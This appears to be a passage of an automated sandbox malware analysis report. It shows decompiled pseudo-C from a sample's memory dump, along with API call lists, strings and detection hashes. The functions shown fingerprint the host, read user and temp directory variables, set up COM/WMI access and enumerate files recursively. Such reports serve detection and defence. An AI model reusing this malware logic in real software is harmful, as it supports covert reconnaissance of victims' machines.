				void* _t32;
				signed int _t37;
				intOrPtr _t42;
				void* _t51;
				intOrPtr* _t53;
				void* _t54;
				void* _t61;

				_t61 = __fp0;
				_t53 = __esi;
				_t51 = __edx;
				_v8 = _v8 & 0x00000000;
				if( *__esi <= 0) {
					L7:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					_t52 = _v8;
					_t32 = E00ED1447(_t51, _a4,  *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + _v8 * 8))); // executed
					if(_t32 == 0) {
						_t42 = E00ECE1B6( *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + 4 + _t52 * 8)));
						if(_t42 != 0 || GetLastError() != 0xd) {
							_v12 = _v12 & 0x00000000;
							_push(2);
							_push( &_v16);
							_push(_a4);
							_v16 = _t42;
							_t37 = 8; // executed
							E00ED12C0(_t37,  *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + _t52 * 8)), _t51, _t61); // executed
							_t54 = _t54 + 0xc;
						} else {
							E00ED1253( *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + 4 + _t52 * 8)), _a4,  *((intOrPtr*)( *((intOrPtr*)(_t53 + 4)) + _t52 * 8))); // executed
						}
					}
					_v8 = _v8 + 1;
				} while (_v8 <  *_t53);
				goto L7;
			}

0x00ed19d1
0x00ed19d1
0x00ed19d1
0x00ed19d7
0x00ed19e0
0x00ed1a58
0x00ed1a5c
0x00000000
0x00000000
0x00000000
0x00ed19e2
0x00ed19e2
0x00ed19e5
0x00ed19ee
0x00ed19f7
0x00ed1a05
0x00ed1a09
0x00ed1a32
0x00ed1a36
0x00ed1a3b
0x00ed1a3c
0x00ed1a3f
0x00ed1a44
0x00ed1a45
0x00ed1a4a
0x00ed1a16
0x00ed1a23
0x00ed1a29
0x00ed1a09
0x00ed1a4d
0x00ed1a53
0x00000000

APIs

Part of subcall function 00ECE1B6: SetLastError.KERNEL32(0000000D,00000000,00EEF83C,00ED18C8), ref: 00ECE1F1

GetLastError.KERNEL32(00000000,0CC48300,?,00EC94FF), ref: 00ED1A0B

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 457ae9b0ac3733c22ae1d4799685f78a6ea8034e8e6c6365fa0a113cc9a5a34c
Instruction ID: 9e5d96c5facb3af7ef1c9f0c316bd3fd2644e5d2020405ed593e4902ba68a861
Opcode Fuzzy Hash: 457ae9b0ac3733c22ae1d4799685f78a6ea8034e8e6c6365fa0a113cc9a5a34c
Instruction Fuzzy Hash: 99119E39905205FFDB20DF94D981A2873F6EB04358F2094AAE415AB3A1DB31EE42DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00EC3727, Relevance: 1.3, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC3727(void* __ebx, void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				char _v44;
				void* __esi;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t31;
				void* _t32;
				void* _t37;

				_t37 = __eflags;
				_t27 = __edx;
				_t26 = __ecx;
				_t6 =  *0xef56a8; // 0xf00000
				E00EDCBC6(_t6,  *((intOrPtr*)(_t6 + 0x224))); // executed
				E00ECD162();
				E00ECE8C6();
				 *0xef5748 = 0;
				 *0xef57a4 = 0;
				 *0xef57a0 = 0;
				E00EC32DE();
				E00ECF5F1();
				_t12 =  *0xef56a8; // 0xf00000
				 *((intOrPtr*)(_t12 + 0xa4)) = 2;
				_t13 =  *0xef56a8; // 0xf00000
				_t32 =  &_v44;
				E00ECEE1F(_t32, _t37,  *((intOrPtr*)(_t13 + 0xac)) + 7);
				E00ECEF97(_t32); // executed
				memset(_t32, 0, 0x27);
				E00EC31EA(__ebx, _t26, _t27, _t32, __fp0);
				_t22 =  *0xef56c8; // 0x520f6c8
				 *((intOrPtr*)(_t22 + 0xdc))(0, _t28, _t31);
				return 0;
			}

0x00ec3727
0x00ec3727
0x00ec3727
0x00ec372a
0x00ec373a
0x00ec373f
0x00ec3744
0x00ec374b
0x00ec3751
0x00ec3757
0x00ec375d
0x00ec3762
0x00ec3767
0x00ec376c
0x00ec3776
0x00ec3785
0x00ec3788
0x00ec3790
0x00ec379b
0x00ec37a3
0x00ec37a8
0x00ec37ae
0x00ec37b9

APIs

Part of subcall function 00ECD162: HeapCreate.KERNELBASE(00000000,00080000,00000000,00EC33C5), ref: 00ECD16B

Part of subcall function 00EC32DE: CreateEnhMetaFileA.GDI32(00000000,B bqw7xLy5t.Y8H7HwUz6.AIj peOCK7PQu . cIN i.wmTzsTSD57 q03W .t7EOOjOO49pnuYTtMcZr A 5 lN864a25B9OkGYj69XlFw9hRVHa3fPbjmevO ayvW3u8.psJh1u2ZqNqI10juwe5ZPzxeNyQpB aRAS0qoM uaxRSevL5FORsgm NBDMu8sB3rlZXwJLQ IgDtc2YCIc4T,nyPWLjfA3LJy0ekfzVx2QXbKj XHc0.QC24 TH,Ygs,00000000,00000000), ref: 00EC3331
Part of subcall function 00EC32DE: Arc.GDI32(00000000,0000005B,0000000B,00000043,0000001D,00000041,00000049,0000000C,0000005D), ref: 00EC3375

Part of subcall function 00ECF5F1: GetCurrentProcess.KERNEL32(?,?,00EC1CE0), ref: 00ECF5F9
Part of subcall function 00ECF5F1: GetModuleFileNameW.KERNEL32(00000000,00F01644,00000000,?,?,00EC1CE0), ref: 00ECF61B
Part of subcall function 00ECF5F1: memset.MSVCRT ref: 00ECF654
Part of subcall function 00ECF5F1: GetVersionExA.KERNEL32(00F00000,00EC1CE0), ref: 00ECF65F
Part of subcall function 00ECF5F1: GetCurrentProcessId.KERNEL32 ref: 00ECF665

memset.MSVCRT ref: 00EC379B

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateCurrentFileProcessmemset$HeapMetaModuleNameVersion
String ID:
API String ID: 2838763789-0
Opcode ID: c3ea1a58b244bc569c69e051b74e3e8cd4ea7dc7cbcc7e6ea04f3d21417e8931
Instruction ID: 062219dc9c3537e35655d33d3af33c442bec8bb100e35c1e612a2eb1616e6573
Opcode Fuzzy Hash: c3ea1a58b244bc569c69e051b74e3e8cd4ea7dc7cbcc7e6ea04f3d21417e8931
Instruction Fuzzy Hash: 51011272601600AFC610BB6BDD4AEAB7BE8EFD5710F46106AF504FB263C6729446C661

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00ECEFDD, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00ECEFDD(void* __fp0) {
				signed int _v8;
				struct _OSVERSIONINFOA* _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				char _v24;
				struct _SYSTEM_INFO _v60;
				char _v188;
				char _v704;
				char _v712;
				char _v3212;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t84;
				struct _OSVERSIONINFOA* _t85;
				void* _t94;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t104;
				intOrPtr _t110;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				intOrPtr _t127;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t137;
				intOrPtr _t141;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr _t160;
				intOrPtr _t162;
				signed int _t167;
				short* _t174;
				struct _OSVERSIONINFOA* _t175;
				void* _t179;
				intOrPtr _t181;
				struct _OSVERSIONINFOA* _t197;
				WCHAR* _t201;
				char* _t202;
				void* _t205;
				WCHAR* _t208;
				char* _t209;
				intOrPtr _t211;
				void* _t213;
				char* _t214;
				void* _t216;
				intOrPtr* _t218;
				void* _t236;

				_t236 = __fp0;
				_t84 =  *0xef56dc; // 0x10000000
				_v16 = _v16 & 0x00000000;
				_v20 = _t84;
				_t85 = E00ECD239(0x1ac4);
				_t197 = _t85;
				_v12 = _t197;
				if(_t197 == 0) {
					return _t85;
				}
				 *((intOrPtr*)(_t197 + 0x1640)) = GetCurrentProcessId();
				_t6 = _t197 + 0x648; // 0x648
				E00EDCDD2(GetTickCount() +  *((intOrPtr*)(_t197 + 0x1640)), _t6);
				_t179 = _t205;
				_t8 = _t197 + 0x1644; // 0x1644
				_t206 = _t8;
				if(GetModuleFileNameW(0, _t8, 0x105) != 0) {
					 *((intOrPtr*)(_t197 + 0x1854)) = E00ECEAFE(_t206);
				}
				 *((intOrPtr*)(_t197 + 0x110)) = E00ECE397(_t179, GetCurrentProcess());
				_t94 = E00ECE5FB( *_t93);
				_pop(_t181);
				if(_t94 == 0) {
					_t95 = E00ECE64E(_t181, _t197, _t206);
					__eflags = _t95;
					_t181 = (0 | _t95 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t197 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t197 + 0x214)) = 3;
				}
				_t15 = _t197 + 0x220; // 0x220
				 *((intOrPtr*)(_t197 + 0x218)) = E00ED7209(_t181, _t15);
				_t97 = E00ED71CE(_t181);
				_push( &_v24);
				 *((intOrPtr*)(_t197 + 0x21c)) = _t97;
				_push( &_v8);
				 *(_t197 + 0x224) = _v20;
				_push( &_v704);
				_push( &_v16);
				_t24 = _t197 + 0x114; // 0x114
				_v16 = 0x80;
				_v8 = 0x100;
				_push( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x110)))));
				_t101 =  *0xef56d4; // 0x520f880
				_push(0);
				if( *((intOrPtr*)(_t101 + 0x68))() == 0) {
					GetLastError();
				}
				_t103 =  *0xef56b0; // 0x520f818
				_t104 =  *((intOrPtr*)(_t103 + 0x3c))(0x1000);
				_t32 = _t197 + 0x228; // 0x228
				_t208 = _t32;
				_v8 = _t208;
				 *(_t197 + 0x1850) = 0 | _t104 > 0x00000000;
				GetModuleFileNameW( *(_t197 + 0x224), _t208, 0x105);
				GetLastError();
				 *((intOrPtr*)(_t197 + 0x434)) = E00ECEAFE(_t208);
				_t37 = _t197 + 0x114; // 0x114
				_t110 = E00ED2147(_t104 > 0, _t37);
				_t38 = _t197 + 0xb0; // 0xb0
				_t209 = _t38;
				 *((intOrPtr*)(_t197 + 0xac)) = _t110;
				E00ED2163(_t209, _t104, _t236, _t110);
				_t40 = _t197 + 0xd0; // 0xd0
				_t174 = _t40;
				if(_t209 != 0) {
					_t167 = MultiByteToWideChar(0, 0, _t209, 0xffffffff, _t174, 0x20);
					if(_t167 > 0) {
						_t174[_t167] = 0;
					}
				}
				_t192 = _v8;
				E00ECED68(_v8, _t197 + 0x438);
				_t175 = _v12;
				E00ED22BC(_t175 + 0x100c, _t236, E00ECEF54(0, _t209, E00ECFE78(_t209)));
				 *((intOrPtr*)(_t175 + 0x101c)) = E00ECE299(GetCurrentProcess());
				memset(_t175, 0, 0x9c);
				_t218 = _t216 + 0x20;
				_t175->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t175);
				_t211 =  *0xef56c8; // 0x520f6c8
				_v8 = _v8 & 0x00000000;
				if( *((intOrPtr*)(_t211 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t211 + 0x6c))(GetCurrentProcess(),  &_v8);
				}
				_t122 = _v8;
				 *((intOrPtr*)(_t175 + 0xa8)) = _t122;
				if(_t122 == 0) {
					GetSystemInfo( &_v60);
					_t124 = _v60.dwOemId & 0x0000ffff;
				} else {
					_t124 = 9;
				}
				_t201 = _t175 + 0x1020;
				 *(_t175 + 0x9c) = _t124;
				GetWindowsDirectoryW(_t201, 0x104);
				_t126 = E00ED3A82(_t192, 0x995);
				_push(0x104);
				_t194 =  &_v712;
				_push( &_v712);
				_v8 = _t126;
				_push(_t126);
				_t127 =  *0xef56c8; // 0x520f6c8
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t162 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t162 + 0xfc))(_v8, _t201);
				}
				E00ED0299( &_v8);
				_t131 =  *0xef56c8; // 0x520f6c8
				 *_t218 = 0x209;
				_t213 = _t175 + 0x1434;
				_push(_t213);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t131 + 0xe0))() == 0) {
					E00ECE17D(0x105, _t213, L"%s\\%s", _t201);
					_t160 =  *0xef56c8; // 0x520f6c8
					_t218 = _t218 + 0xc;
					 *((intOrPtr*)(_t160 + 0xfc))(L"USERPROFILE", _t213, "TEMP");
				}
				_push(0x20a);
				_push(_t175 + 0x122a);
				_t134 =  *0xef56c8; // 0x520f6c8
				_t202 = L"TEMP";
				_push(_t202);
				if( *((intOrPtr*)(_t134 + 0xe0))() == 0) {
					_t157 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t157 + 0xfc))(_t202, _t213);
				}
				_push(0x40);
				_push( &_v188);
				_t137 =  *0xef56c8; // 0x520f6c8
				_t214 = L"SystemDrive";
				_push(_t214);
				if( *((intOrPtr*)(_t137 + 0xe0))() == 0) {
					_t155 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t155 + 0xfc))(_t214, L"C:");
				}
				_t141 =  *0xef56c8; // 0x520f6c8
				_v12 = 0x7f;
				 *((intOrPtr*)(_t141 + 0xb0))(_t175 + 0x199c,  &_v12);
				E00EDCDD2(E00ECEF54(0, _t175 + 0x100c, E00ECFE78(_t175 + 0x100c)),  &_v3212);
				E00EDCF76( &_v3212, _t175 + 0x1858, 0x20);
				E00ECE851(_t175 + 0x1878, 1, 0x14, 0x1e,  &_v3212);
				 *((intOrPtr*)(_t175 + 0x1898)) = E00ECF3A9(_t194);
				return _t175;
			}

0x00ecefdd
0x00ecefe6
0x00ecefeb
0x00eceff5
0x00eceff8
0x00eceffd
0x00ecf000
0x00ecf005
0x00ecf3a8
0x00ecf3a8
0x00ecf013
0x00ecf019
0x00ecf02d
0x00ecf033
0x00ecf03a
0x00ecf03a
0x00ecf04b
0x00ecf054
0x00ecf054
0x00ecf066
0x00ecf06e
0x00ecf074
0x00ecf077
0x00ecf085
0x00ecf08c
0x00ecf091
0x00ecf091
0x00ecf092
0x00ecf079
0x00ecf079
0x00ecf079
0x00ecf098
0x00ecf0a3
0x00ecf0a9
0x00ecf0b1
0x00ecf0b2
0x00ecf0be
0x00ecf0bf
0x00ecf0cb
0x00ecf0cf
0x00ecf0d0
0x00ecf0d7
0x00ecf0e4
0x00ecf0eb
0x00ecf0ed
0x00ecf0f2
0x00ecf0f9
0x00ecf0fb
0x00ecf0fb
0x00ecf101
0x00ecf10b
0x00ecf116
0x00ecf116
0x00ecf123
0x00ecf126
0x00ecf12c
0x00ecf132
0x00ecf13f
0x00ecf145
0x00ecf14c
0x00ecf151
0x00ecf151
0x00ecf15a
0x00ecf160
0x00ecf167
0x00ecf167
0x00ecf16f
0x00ecf17b
0x00ecf183
0x00ecf187
0x00ecf187
0x00ecf183
0x00ecf18b
0x00ecf194
0x00ecf199
0x00ecf1b2
0x00ecf1d4
0x00ecf1da
0x00ecf1df
0x00ecf1e3
0x00ecf1e5
0x00ecf1eb
0x00ecf1f1
0x00ecf1f9
0x00ecf202
0x00ecf202
0x00ecf205
0x00ecf208
0x00ecf210
0x00ecf21b
0x00ecf221
0x00ecf212
0x00ecf214
0x00ecf214
0x00ecf22b
0x00ecf232
0x00ecf239
0x00ecf244
0x00ecf24a
0x00ecf24b
0x00ecf251
0x00ecf252
0x00ecf255
0x00ecf256
0x00ecf263
0x00ecf265
0x00ecf26e
0x00ecf26e
0x00ecf278
0x00ecf27d
0x00ecf282
0x00ecf289
0x00ecf28f
0x00ecf290
0x00ecf29d
0x00ecf2af
0x00ecf2b4
0x00ecf2b9
0x00ecf2c2
0x00ecf2c2
0x00ecf2c8
0x00ecf2d3
0x00ecf2d4
0x00ecf2d9
0x00ecf2de
0x00ecf2e7
0x00ecf2e9
0x00ecf2f0
0x00ecf2f0
0x00ecf2f6
0x00ecf2fe
0x00ecf2ff
0x00ecf304
0x00ecf309
0x00ecf312
0x00ecf314
0x00ecf31f
0x00ecf31f
0x00ecf330
0x00ecf335
0x00ecf33c
0x00ecf362
0x00ecf377
0x00ecf38f
0x00ecf39c
0x00000000

APIs

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

GetCurrentProcessId.KERNEL32 ref: 00ECF00D
GetTickCount.KERNEL32 ref: 00ECF020
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 00ECF043
GetCurrentProcess.KERNEL32 ref: 00ECF05A
GetLastError.KERNEL32 ref: 00ECF0FB
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 00ECF12C
GetLastError.KERNEL32 ref: 00ECF132
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 00ECF17B
GetCurrentProcess.KERNEL32 ref: 00ECF1C0
memset.MSVCRT ref: 00ECF1DA
GetVersionExA.KERNEL32(?), ref: 00ECF1E5
GetCurrentProcess.KERNEL32(00000000), ref: 00ECF1FF
GetSystemInfo.KERNEL32(?), ref: 00ECF21B
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00ECF239

Strings

USERPROFILE, xrefs: 00ECF290, 00ECF2BD
%s\%s, xrefs: 00ECF2A5
TEMP, xrefs: 00ECF29F
SystemDrive, xrefs: 00ECF304, 00ECF309, 00ECF31E
TEMP, xrefs: 00ECF2D9, 00ECF2DE, 00ECF2EF

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharCountDirectoryHeapInfoMultiSystemTickVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3345665715-2706916422
Opcode ID: 167e5c23327e40a89bf7821f6da0f32f4f83916900601972c9fdc2c95b468174
Instruction ID: 699f0a7bcb536aa1044753d8adbed489f2a6f7f94ba1dfacb7d10f8bddb1fdf4
Opcode Fuzzy Hash: 167e5c23327e40a89bf7821f6da0f32f4f83916900601972c9fdc2c95b468174
Instruction Fuzzy Hash: 4FB19F72A01205AFDB14EFA5DD49FEA77A8FF08310F014169F619FB291DB709A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6E91, Relevance: 7.6, APIs: 5, Instructions: 86
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00ED6E91(void* __ecx, void* __edi, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char* _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;
				intOrPtr* _t19;
				void* _t22;
				intOrPtr* _t26;
				void* _t34;

				_v8 = 0;
				_v12 = 0;
				__imp__CoInitializeEx(0, 0, _t34, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t16 =  &_v8;
				__imp__CoCreateInstance(0xee1474, 0, 1, 0xee13a4, _t16);
				if(_t16 < 0) {
					L4:
					_t17 = _v12;
					if(_t17 != 0) {
						 *((intOrPtr*)( *_t17 + 8))(_t17);
					}
					_t18 = _v8;
					if(_t18 != 0) {
						 *((intOrPtr*)( *_t18 + 8))(_t18);
					}
					_t19 = 0;
				} else {
					__imp__#2(_a4, __edi);
					_t26 = _v8;
					_t22 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _t16, 0, 0, 0, 0, 0, 0,  &_v12);
					if(_t22 < 0) {
						goto L4;
					} else {
						__imp__CoSetProxyBlanket(_v12, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t22 < 0) {
							goto L4;
						} else {
							_t19 = E00ECD239(8);
							if(_t19 != 0) {
								 *((intOrPtr*)(_t19 + 4)) = _v8;
								 *_t19 = _v12;
							} else {
								goto L4;
							}
						}
					}
				}
				return _t19;
			}

0x00ed6e9b
0x00ed6e9e
0x00ed6ea1
0x00ed6eb2
0x00ed6eb8
0x00ed6ec9
0x00ed6ed1
0x00ed6f19
0x00ed6f19
0x00ed6f1e
0x00ed6f23
0x00ed6f23
0x00ed6f26
0x00ed6f2b
0x00ed6f30
0x00ed6f30
0x00ed6f33
0x00ed6ed3
0x00ed6ed7
0x00ed6edd
0x00ed6eee
0x00ed6ef4
0x00000000
0x00ed6ef6
0x00ed6f03
0x00ed6f0b
0x00000000
0x00ed6f0d
0x00ed6f0f
0x00ed6f17
0x00ed6f3a
0x00ed6f40
0x00000000
0x00000000
0x00000000
0x00ed6f17
0x00ed6f0b
0x00ed6ef4
0x00ed6f44

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,?,?,00ED6F8E,00000000,000003FE,76996980,00000000,00000000), ref: 00ED6EA1
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,00ED6F8E,00000000,000003FE,76996980), ref: 00ED6EB2
CoCreateInstance.OLE32(00EE1474,00000000,00000001,00EE13A4,00000000,?,?,?,00ED6F8E,00000000,000003FE,76996980,00000000,00000000), ref: 00ED6EC9
SysAllocString.OLEAUT32(00000000), ref: 00ED6ED7
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,00ED6F8E,00000000,000003FE,76996980,00000000,00000000), ref: 00ED6F03

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 43d83780742b8f5394bef5bdff8e9a74bc6da7420ddcd6ec4d3fddcb072e519f
Instruction ID: 7a60d678c172eab52e2b1b1f5605e6d602978a9f1773bde8e1da3bb546dbf464
Opcode Fuzzy Hash: 43d83780742b8f5394bef5bdff8e9a74bc6da7420ddcd6ec4d3fddcb072e519f
Instruction Fuzzy Hash: 70211D70602229BFD7258F92EC4DE9B7F7CEF4A7A4F100159F509AA291C6719A41CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0C51, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 131
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00ED0C51(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _v12;
				char _v16;
				WCHAR* _v20;
				intOrPtr _v568;
				short _v570;
				struct _WIN32_FIND_DATAW _v616;
				WCHAR* _t56;
				void* _t57;
				signed int _t61;
				intOrPtr _t64;
				intOrPtr _t66;
				char _t69;
				intOrPtr _t73;
				intOrPtr _t76;
				void* _t79;
				intOrPtr _t80;
				signed char _t82;
				intOrPtr _t88;
				signed int _t89;
				void* _t90;
				void* _t91;

				_t89 = 0;
				_push(0);
				_push(L"\\*");
				_t56 = E00ECE9D2(_a4);
				_t91 = _t90 + 0xc;
				_v20 = _t56;
				if(_t56 == 0) {
					return _t56;
				}
				_t57 = FindFirstFileW(_t56,  &_v616);
				_v12 = _t57;
				if(_t57 == 0xffffffff) {
					L28:
					return E00ECD1EA( &_v20, 0xfffffffe);
				} else {
					_t82 = _a16;
					_t88 = _a8;
					do {
						if(_a28 == _t89) {
							L5:
							if(_v616.cFileName != 0x2e || _v570 != _t89 && (_v570 != 0x2e || _v568 != _t89)) {
								_t61 = _v616.dwFileAttributes & 0x00000010;
								if(_t61 == 0 || (_t82 & 0x00000002) == 0) {
									if(_t61 != _t89 || (_t82 & 0x00000004) == 0) {
										goto L20;
									} else {
										goto L13;
									}
								} else {
									L13:
									if(_a12 <= 0) {
										L19:
										_t89 = 0;
										L20:
										if((_v616.dwFileAttributes & 0x00000010) != 0 && (_t82 & 0x00000001) != 0) {
											_push(_t89);
											_push( &(_v616.cFileName));
											_push("\\");
											_t69 = E00ECE9D2(_a4);
											_t91 = _t91 + 0x10;
											_v16 = _t69;
											if(_t69 != _t89) {
												if(_a32 != _t89) {
													_t73 =  *0xef56c8; // 0x520f6c8
													 *((intOrPtr*)(_t73 + 0xb4))(_a32);
												}
												E00ED0C51(_v16, _t88, _a12, _t82, _a20, _a24, _a28, _a32, _a36);
												_t91 = _t91 + 0x24;
												E00ECD1EA( &_v16, 0xfffffffe);
											}
										}
										goto L26;
									} else {
										goto L14;
									}
									do {
										L14:
										_push( *((intOrPtr*)(_t88 + _t89 * 4)));
										_push( &(_v616.cFileName));
										_t76 =  *0xef56ac; // 0x520f8f8
										if( *((intOrPtr*)(_t76 + 0x18))() == 0) {
											goto L18;
										}
										_t79 = _a20(_a4,  &_v616, _a24);
										_t91 = _t91 + 0xc;
										if(_t79 == 0) {
											goto L19;
										} else {
											if(_a36 != 0) {
												_t80 =  *0xef56c8; // 0x520f6c8
												 *((intOrPtr*)(_t80 + 0xb4))(_a36);
											}
										}
										L18:
										_t89 = _t89 + 1;
									} while (_t89 < _a12);
									goto L19;
								}
							} else {
								goto L26;
							}
						}
						_t64 =  *0xef56c8; // 0x520f6c8
						_push(_t89);
						_push(_a28);
						if( *((intOrPtr*)(_t64 + 0x2c))() != 0x102) {
							break;
						}
						goto L5;
						L26:
					} while (FindNextFileW(_v12,  &_v616) != 0);
					_t66 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t66 + 0x78))(_v12);
					goto L28;
				}
			}

0x00ed0c5d
0x00ed0c5f
0x00ed0c60
0x00ed0c68
0x00ed0c6d
0x00ed0c70
0x00ed0c75
0x00ed0ded
0x00ed0ded
0x00ed0c83
0x00ed0c89
0x00ed0c8f
0x00ed0ddc
0x00000000
0x00ed0c95
0x00ed0c95
0x00ed0c98
0x00ed0c9b
0x00ed0c9e
0x00ed0cb7
0x00ed0cbf
0x00ed0ceb
0x00ed0cee
0x00ed0cf7
0x00000000
0x00000000
0x00000000
0x00000000
0x00ed0cfe
0x00ed0cfe
0x00ed0d02
0x00ed0d4b
0x00ed0d4b
0x00ed0d4d
0x00ed0d54
0x00ed0d5b
0x00ed0d62
0x00ed0d63
0x00ed0d6b
0x00ed0d70
0x00ed0d73
0x00ed0d78
0x00ed0d7d
0x00ed0d82
0x00ed0d87
0x00ed0d87
0x00ed0da4
0x00ed0da9
0x00ed0db2
0x00ed0db8
0x00ed0d78
0x00000000
0x00000000
0x00000000
0x00000000
0x00ed0d04
0x00ed0d04
0x00ed0d04
0x00ed0d0d
0x00ed0d0e
0x00ed0d18
0x00000000
0x00000000
0x00ed0d27
0x00ed0d2a
0x00ed0d2f
0x00000000
0x00ed0d31
0x00ed0d35
0x00ed0d3a
0x00ed0d3f
0x00ed0d3f
0x00ed0d35
0x00ed0d45
0x00ed0d45
0x00ed0d46
0x00000000
0x00ed0d04
0x00000000
0x00000000
0x00000000
0x00ed0cbf
0x00ed0ca0
0x00ed0ca5
0x00ed0ca6
0x00ed0cb1
0x00000000
0x00000000
0x00000000
0x00ed0db9
0x00ed0dc9
0x00ed0dd4
0x00ed0dd9
0x00000000
0x00ed0dd9

APIs

Part of subcall function 00ECE9D2: lstrcatW.KERNEL32(00000000,00000000), ref: 00ECEA12

FindFirstFileW.KERNEL32(00000000,?,00ED3598,00EF5778,00000000), ref: 00ED0C83
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED0DC3

Strings

., xrefs: 00ED0CB7
., xrefs: 00ED0CCE

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: FileFind$FirstNextlstrcat
String ID: .$.
API String ID: 4165875925-3769392785
Opcode ID: f736c034f3aaf920e4b62844b8576f6d428f582f775200ea1b943169549d7620
Instruction ID: 7d0732b987cfe2b2e3c7b2833b07167045b14a6ff52df3b54286bbe2a8276dc2
Opcode Fuzzy Hash: f736c034f3aaf920e4b62844b8576f6d428f582f775200ea1b943169549d7620
Instruction Fuzzy Hash: BF416031901219AFCF219F90CD48BED7BB6EF04328F091256F958B6261D771DE96CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE0AF, Relevance: 3.0, APIs: 2, Instructions: 22
timeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00ECE0AF(void* __ecx, intOrPtr __edx, intOrPtr* __esi) {
				struct _FILETIME _v12;
				intOrPtr _t7;
				intOrPtr _t11;

				_t11 = __edx;
				GetSystemTimeAsFileTime( &_v12);
				asm("sbb eax, 0x19db1de");
				_t7 = E00EDFD70(_v12.dwLowDateTime - 0xd53e8000, _v12.dwHighDateTime, 0x989680, 0);
				if(__esi != 0) {
					 *__esi = _t7;
					 *((intOrPtr*)(__esi + 4)) = _t11;
					return _t7;
				}
				return _t7;
			}

0x00ece0af
0x00ece0b8
0x00ece0d1
0x00ece0d8
0x00ece0df
0x00ece0e1
0x00ece0e3
0x00000000
0x00ece0e3
0x00ece0e7

APIs

GetSystemTimeAsFileTime.KERNEL32(00EC8610,?,?,?,00EC8610,00000000), ref: 00ECE0B8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ECE0D8

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
